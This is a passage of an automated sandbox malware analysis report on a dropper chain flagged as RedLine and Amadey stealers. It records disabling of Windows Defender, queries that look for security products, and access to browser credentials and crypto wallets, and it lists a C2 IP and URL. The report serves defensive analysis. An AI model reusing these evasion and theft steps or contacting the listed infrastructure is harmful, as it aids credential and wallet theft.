                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected RedLine Stealer
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 3.3.gOk22TE.exe.4c0bc20.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.3.gOk22TE.exe.4c0bc20.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.bRz07Kk.exe.1e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000003.00000003.252780522.0000000004C09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000000.277000636.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: bRz07Kk.exe PID: 4812, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe, type: DROPPED
                            Yara detected Amadeys stealer DLL
                            Source: Yara matchFile source: 1.3.gck46uD.exe.497cc20.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.3.gck46uD.exe.497cc20.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000001.00000003.250210360.00000000048F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\dEX81lT.exe, type: DROPPED
                            Tries to steal Crypto Currency Wallets
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                            Source: Yara matchFile source: Process Memory Space: bRz07Kk.exe PID: 4812, type: MEMORYSTR

                            Remote Access Functionality

                            barindex
                            Yara detected RedLine Stealer
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 3.3.gOk22TE.exe.4c0bc20.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.3.gOk22TE.exe.4c0bc20.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.bRz07Kk.exe.1e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000003.00000003.252780522.0000000004C09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000000.277000636.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: bRz07Kk.exe PID: 4812, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid Accounts221
                            Windows Management Instrumentation                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		21
                            Disable or Modify Tools                            		1
                            OS Credential Dumping                            		1
                            System Time Discovery                            		Remote Services1
                            Archive Collected Data                            		Exfiltration Over Other Network Medium2
                            Encrypted Channel                            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                            System Shutdown/Reboot
                            Default Accounts12
                            Native API                            		1
                            Windows Service                            		2
                            Bypass User Access Control                            		11
                            Obfuscated Files or Information                            		LSASS Memory1
                            Account Discovery                            		Remote Desktop Protocol2
                            Data from Local System                            		Exfiltration Over Bluetooth1
                            Non-Standard Port                            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts2
                            Command and Scripting Interpreter                            		Logon Script (Windows)1
                            Access Token Manipulation                            		1
                            Timestomp                            		Security Account Manager1
                            File and Directory Discovery                            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                            Application Layer Protocol                            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts1
                            Service Execution                            		Logon Script (Mac)1
                            Windows Service                            		1
                            DLL Side-Loading                            		NTDS127
                            System Information Discovery                            		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                            Cloud AccountsCronNetwork Logon Script1
                            Process Injection                            		2
                            Bypass User Access Control                            		LSA Secrets22
                            Security Software Discovery                            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable MediaLaunchdRc.commonRc.common1
                            Masquerading                            		Cached Domain Credentials11
                            Process Discovery                            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup ItemsStartup Items231
                            Virtualization/Sandbox Evasion                            		DCSync231
                            Virtualization/Sandbox Evasion                            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                            Access Token Manipulation                            		Proc Filesystem1
                            Application Window Discovery                            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                            Process Injection                            		/etc/passwd and /etc/shadow1
                            System Owner/User Discovery                            		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                            Rundll32                            		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 signatures2 2 Behavior Graph ID: 808971 Sample: file.exe Startdate: 15/02/2023 Architecture: WINDOWS Score: 100 54 Snort IDS alert for network traffic 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Antivirus / Scanner detection for submitted sample 2->58 60 7 other signatures 2->60 9 file.exe 1 4 2->9         started        12 rundll32.exe 2->12         started        14 rundll32.exe 2->14         started        16 2 other processes 2->16 process3 file4 44 C:\Users\user\AppData\Local\...\gck46uD.exe, PE32 9->44 dropped 46 C:\Users\user\AppData\Local\...\fcC6215.exe, PE32 9->46 dropped 18 gck46uD.exe 1 4 9->18         started        process5 file6 36 C:\Users\user\AppData\Local\...\gDR79xP.exe, PE32 18->36 dropped 38 C:\Users\user\AppData\Local\...\dEX81lT.exe, PE32 18->38 dropped 62 Antivirus detection for dropped file 18->62 64 Machine Learning detection for dropped file 18->64 22 gDR79xP.exe 1 4 18->22         started        signatures7 process8 file9 40 C:\Users\user\AppData\Local\...\gOk22TE.exe, PE32 22->40 dropped 42 C:\Users\user\AppData\Local\...\ckg5133.exe, PE32 22->42 dropped 66 Antivirus detection for dropped file 22->66 68 Machine Learning detection for dropped file 22->68 26 gOk22TE.exe 1 4 22->26         started        signatures10 process11 file12 48 C:\Users\user\AppData\Local\...\bRz07Kk.exe, PE32 26->48 dropped 50 C:\Users\user\AppData\Local\...\aWM14.exe, PE32 26->50 dropped 70 Antivirus detection for dropped file 26->70 72 Machine Learning detection for dropped file 26->72 30 bRz07Kk.exe 5 26->30         started        34 aWM14.exe 9 1 26->34         started        signatures13 process14 dnsIp15 52 193.233.20.13, 4136, 49702 REDCOM-ASRedcomKhabarovskRussiaRU Russian Federation 30->52 74 Antivirus detection for dropped file 30->74 76 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 30->76 78 Machine Learning detection for dropped file 30->78 84 3 other signatures 30->84 80 Disable Windows Defender notifications (registry) 34->80 82 Disable Windows Defender real time protection (registry) 34->82 signatures16

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            file.exe56%VirustotalBrowse
                            file.exe100%AviraHEUR/AGEN.1252166
                            file.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe100%AviraHEUR/AGEN.1252166
                            C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe100%AviraHEUR/AGEN.1252166
                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe100%AviraHEUR/AGEN.1252166
                            C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe100%AviraHEUR/AGEN.1252166
                            C:\Users\user\AppData\Local\Temp\IXP001.TMP\dEX81lT.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP002.TMP\ckg5133.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\fcC6215.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe100%Joe Sandbox ML

                            Unpacked PE Files

                            SourceDetectionScannerLabelLinkDownload
                            1.0.gck46uD.exe.20000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                            2.0.gDR79xP.exe.100000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                            2.2.gDR79xP.exe.100000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                            0.0.file.exe.50000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                            1.2.gck46uD.exe.20000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                            3.2.gOk22TE.exe.10e0000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                            2.3.gDR79xP.exe.4950820.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            6.0.bRz07Kk.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                            3.0.gOk22TE.exe.10e0000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                            0.2.file.exe.50000.0.unpack100%AviraHEUR/AGEN.1252166Download File

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                            http://tempuri.org/0%URL Reputationsafe
                            http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                            http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                            http://tempuri.org/Entity/Id90%URL Reputationsafe
                            http://tempuri.org/Entity/Id80%URL Reputationsafe
                            http://tempuri.org/Entity/Id50%URL Reputationsafe
                            http://tempuri.org/Entity/Id70%URL Reputationsafe
                            http://tempuri.org/Entity/Id60%URL Reputationsafe
                            http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
                            http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                            http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
                            https://api.ip.sb/ip0%URL Reputationsafe
                            http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
                            http://tempuri.org/Entity/Id200%URL Reputationsafe
                            http://tempuri.org/Entity/Id210%URL Reputationsafe
                            http://tempuri.org/Entity/Id220%URL Reputationsafe
                            http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
                            http://tempuri.org/Entity/Id100%URL Reputationsafe
                            http://tempuri.org/Entity/Id110%URL Reputationsafe
                            http://tempuri.org/Entity/Id120%URL Reputationsafe
                            http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
                            http://tempuri.org/Entity/Id130%URL Reputationsafe
                            http://tempuri.org/Entity/Id140%URL Reputationsafe
                            http://tempuri.org/Entity/Id150%URL Reputationsafe
                            http://tempuri.org/Entity/Id160%URL Reputationsafe
                            http://tempuri.org/Entity/Id170%URL Reputationsafe
                            http://tempuri.org/Entity/Id180%URL Reputationsafe
                            http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                            http://tempuri.org/Entity/Id190%URL Reputationsafe
                            http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                            http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                            http://tempuri.org/Entity/Id4(0%URL Reputationsafe
                            193.233.20.2/Bn89hku/index.php0%URL Reputationsafe
                            http://tempuri.org/Entity/Id17Response0%URL Reputationsafe

                            Domains and IPs

                            Contacted Domains

                            No contacted domains info

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            193.233.20.2/Bn89hku/index.phptrue
                            • URL Reputation: safe
                            		low

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextbRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/02/sc/sctbRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/faultPbRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/chrome_newtabbRz07Kk.exe, 00000006.00000002.370107810.0000000003810000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000035A4000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.000000000290B000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.00000000027ED000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.000000000388E000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.000000000287A000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.0000000003658000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002760000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.00000000026D4000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.000000000363B000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.0000000003753000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000036D5000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.000000000382D000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.0000000003736000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000036B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkbRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=bRz07Kk.exe, 00000006.00000002.370107810.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000036B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinarybRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://tempuri.org/Entity/Id12ResponsebRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://tempuri.org/bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://tempuri.org/Entity/Id2ResponsebRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://tempuri.org/Entity/Id21ResponsebRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapbRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://tempuri.org/Entity/Id9bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDbRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://tempuri.org/Entity/Id8bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://tempuri.org/Entity/Id5bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/PreparebRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://tempuri.org/Entity/Id7bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://tempuri.org/Entity/Id6bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretbRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://tempuri.org/Entity/Id19ResponsebRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licensebRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssuebRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedbRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequencebRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/faultbRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2004/10/wsatbRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeybRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://tempuri.org/Entity/Id15ResponsebRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namebRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewbRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterbRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://tempuri.org/Entity/Id6ResponsebRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeybRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://api.ip.sb/ipgOk22TE.exe, 00000003.00000003.252780522.0000000004C09000.00000004.00000020.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000000.277000636.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, bRz07Kk.exe.3.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://schemas.xmlsoap.org/ws/2004/04/scbRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCbRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelbRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://tempuri.org/Entity/Id9ResponsebRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=bRz07Kk.exe, 00000006.00000002.370107810.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000036B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://tempuri.org/Entity/Id20bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://tempuri.org/Entity/Id21bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://tempuri.org/Entity/Id22bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssuebRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://tempuri.org/Entity/Id1ResponsebRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
